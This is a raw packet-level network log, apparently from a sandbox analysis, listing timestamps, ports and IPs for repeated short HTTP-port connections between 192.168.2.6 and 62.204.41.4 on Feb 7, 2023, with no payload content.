Feb 7, 2023 20:00:51.366344929 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366358995 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366369963 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366384029 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366405964 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.366413116 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.366444111 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.428942919 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.428977013 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.428997040 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429020882 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429042101 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429066896 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429088116 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429094076 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.429109097 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429132938 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429143906 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.429157019 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429179907 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429184914 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.429203033 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.429219007 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.429258108 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.429639101 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.437640905 CET	49721	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491353035 CET	80	49720	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491441965 CET	49720	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491710901 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491753101 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491781950 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491784096 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491816044 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491816998 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491835117 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491847992 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491867065 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491884947 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491892099 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491919041 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491925955 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491950989 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.491955042 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.491978884 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.492002010 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.492007017 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.492014885 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.492037058 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.492050886 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.492067099 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.492082119 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.492098093 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.500317097 CET	80	49721	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.500446081 CET	49721	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.504070997 CET	49721	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.554550886 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.554604053 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.554637909 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.554676056 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.554722071 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.554749012 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.554764986 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.554827929 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.554827929 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.566587925 CET	80	49721	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.568952084 CET	80	49721	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.569025993 CET	49721	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.722942114 CET	49721	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.723182917 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.724709034 CET	49722	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.785079956 CET	80	49722	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.785243034 CET	49722	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.785499096 CET	80	49721	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.785598993 CET	49721	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.785639048 CET	80	49719	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.785790920 CET	49719	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.810569048 CET	49722	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:51.871809959 CET	80	49722	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.875080109 CET	80	49722	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:51.875233889 CET	49722	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.001391888 CET	49722	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.002315044 CET	49723	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.062828064 CET	80	49722	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.063009977 CET	49722	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.064327955 CET	80	49723	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.064536095 CET	49723	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.073818922 CET	49723	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.137471914 CET	80	49723	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.141586065 CET	80	49723	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.141916990 CET	49723	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.244890928 CET	49723	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.246555090 CET	49724	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.306950092 CET	80	49723	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.307140112 CET	49723	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.310508013 CET	80	49724	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.310739040 CET	49724	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.311391115 CET	49724	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.373878956 CET	80	49724	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.376157045 CET	80	49724	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.376219988 CET	49724	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.480310917 CET	49724	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.498469114 CET	49725	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.543519974 CET	80	49724	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.543615103 CET	49724	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.562406063 CET	80	49725	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.562546015 CET	49725	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.567466974 CET	49725	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.628998041 CET	80	49725	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.634872913 CET	80	49725	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.635080099 CET	49725	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.763715029 CET	49725	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.764470100 CET	49726	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.825203896 CET	80	49725	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.825270891 CET	80	49726	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.825319052 CET	49725	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.825422049 CET	49726	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.825968981 CET	49726	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.886606932 CET	80	49726	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.889281034 CET	80	49726	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:52.889472008 CET	49726	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.994492054 CET	49726	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:52.995419025 CET	49727	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.057535887 CET	80	49726	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.057647943 CET	49726	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.058389902 CET	80	49727	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.058510065 CET	49727	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.058922052 CET	49727	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.121223927 CET	80	49727	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.126007080 CET	80	49727	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.126113892 CET	49727	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.229644060 CET	49727	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.230392933 CET	49728	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.292248011 CET	80	49728	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.292324066 CET	80	49727	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.292537928 CET	49728	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.292596102 CET	49727	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.301054955 CET	49728	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.363086939 CET	80	49728	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.365572929 CET	80	49728	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.365720987 CET	49728	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.479583979 CET	49728	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.481050014 CET	49729	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.541476011 CET	80	49728	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.541611910 CET	49728	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.542740107 CET	80	49729	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.542897940 CET	49729	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.543428898 CET	49729	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.605065107 CET	80	49729	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.607263088 CET	80	49729	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.607446909 CET	49729	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.728379011 CET	49729	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.729371071 CET	49730	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.790361881 CET	80	49729	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.790457010 CET	49729	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.792201996 CET	80	49730	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.792309046 CET	49730	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.793502092 CET	49730	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.855752945 CET	80	49730	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.858115911 CET	80	49730	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:53.858242989 CET	49730	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.962373972 CET	49730	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:53.963088989 CET	49731	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.022685051 CET	80	49731	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.022872925 CET	49731	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.023441076 CET	49731	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.024976015 CET	80	49730	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.025108099 CET	49730	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.083904028 CET	80	49731	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.087827921 CET	80	49731	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.087984085 CET	49731	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.197232008 CET	49731	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.198600054 CET	49732	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.257769108 CET	80	49731	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.257961035 CET	49731	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.260874033 CET	80	49732	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.261082888 CET	49732	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.261631966 CET	49732	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.325479031 CET	80	49732	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.325506926 CET	80	49732	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.325627089 CET	49732	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.434515953 CET	49732	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.435579062 CET	49733	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.496603966 CET	80	49733	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.496906996 CET	49733	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.497040987 CET	80	49732	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.497198105 CET	49732	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.497422934 CET	49733	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.558015108 CET	80	49733	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.562045097 CET	80	49733	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.562391043 CET	49733	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.670484066 CET	49733	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.672830105 CET	49734	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.731658936 CET	80	49733	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.731885910 CET	49733	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.736289978 CET	80	49734	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.736505032 CET	49734	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.737090111 CET	49734	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.800348043 CET	80	49734	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.802834034 CET	80	49734	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.803055048 CET	49734	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.919841051 CET	49734	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.921137094 CET	49735	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.982788086 CET	80	49734	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.982845068 CET	80	49735	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:54.983025074 CET	49734	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.983103037 CET	49735	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:54.983577967 CET	49735	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.044469118 CET	80	49735	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.050860882 CET	80	49735	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.051070929 CET	49735	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.166558027 CET	49735	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.167601109 CET	49736	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.227437973 CET	80	49735	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.227680922 CET	49735	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.230170012 CET	80	49736	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.230429888 CET	49736	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.230834007 CET	49736	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.293387890 CET	80	49736	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.295732975 CET	80	49736	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.295903921 CET	49736	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.400804043 CET	49736	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.401669025 CET	49737	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.463325024 CET	80	49737	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.463413954 CET	80	49736	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.463783026 CET	49736	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.464116096 CET	49737	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.466121912 CET	49737	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.528280020 CET	80	49737	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.530755043 CET	80	49737	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.530898094 CET	49737	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.635534048 CET	49737	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.636482954 CET	49738	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.697251081 CET	80	49738	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.697280884 CET	80	49737	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.697484016 CET	49737	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.699661016 CET	49738	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.702188015 CET	49738	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.762984037 CET	80	49738	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.765414000 CET	80	49738	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.765552998 CET	49738	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.873256922 CET	49738	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.873991966 CET	49739	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.934096098 CET	80	49738	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.934256077 CET	49738	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.935236931 CET	80	49739	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.935340881 CET	49739	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.935980082 CET	49739	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:55.997355938 CET	80	49739	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.999777079 CET	80	49739	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:55.999989986 CET	49739	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.108978987 CET	49739	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.109782934 CET	49740	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.170209885 CET	80	49740	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.170283079 CET	80	49739	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.170367002 CET	49740	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.170397043 CET	49739	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.170996904 CET	49740	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.231265068 CET	80	49740	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.234837055 CET	80	49740	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.234971046 CET	49740	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.359354019 CET	49740	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.360424042 CET	49741	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.419842958 CET	80	49740	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.420030117 CET	49740	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.422981977 CET	80	49741	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.423090935 CET	49741	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.423672915 CET	49741	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.485204935 CET	80	49741	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.487675905 CET	80	49741	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.487905025 CET	49741	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.605377913 CET	49741	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.606257915 CET	49742	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.665697098 CET	80	49742	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.665824890 CET	49742	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.667140007 CET	80	49741	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.667237043 CET	49741	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.667263031 CET	49742	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.726438999 CET	80	49742	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.728579044 CET	80	49742	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.728652954 CET	49742	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.838176966 CET	49742	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.838916063 CET	49743	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.897670031 CET	80	49742	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.898996115 CET	49742	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.900239944 CET	80	49743	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.901916027 CET	49743	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.902350903 CET	49743	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:56.963887930 CET	80	49743	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.967124939 CET	80	49743	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:56.967365980 CET	49743	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.073518038 CET	49743	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.074635029 CET	49744	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.135040998 CET	80	49743	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.135246992 CET	49743	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.137984991 CET	80	49744	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.141964912 CET	49744	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.142499924 CET	49744	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.204029083 CET	80	49744	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.207439899 CET	80	49744	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.207595110 CET	49744	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.323312998 CET	49744	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.324645996 CET	49745	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.384975910 CET	80	49744	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.385025024 CET	80	49745	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.385133028 CET	49744	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.385229111 CET	49745	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.394746065 CET	49745	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.455444098 CET	80	49745	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.457775116 CET	80	49745	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.457984924 CET	49745	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.582240105 CET	49745	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.583457947 CET	49746	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.643151045 CET	80	49745	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.643943071 CET	49745	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.646279097 CET	80	49746	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.646410942 CET	49746	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.646912098 CET	49746	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.709091902 CET	80	49746	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.712091923 CET	80	49746	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.712630033 CET	49746	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.822938919 CET	49746	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.823654890 CET	49747	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.885341883 CET	80	49747	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.885809898 CET	49747	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.886349916 CET	80	49746	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.886492968 CET	49746	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.887103081 CET	49747	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:57.947165012 CET	80	49747	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.949150085 CET	80	49747	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:57.949311972 CET	49747	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.058672905 CET	49747	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.060165882 CET	49748	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.119796991 CET	80	49747	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.120002985 CET	49747	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.120944977 CET	80	49748	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.121097088 CET	49748	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.128864050 CET	49748	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:00:58.189838886 CET	80	49748	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.193397999 CET	80	49748	62.204.41.4	192.168.2.6
Feb 7, 2023 20:00:58.193674088 CET	49748	80	192.168.2.6	62.204.41.4
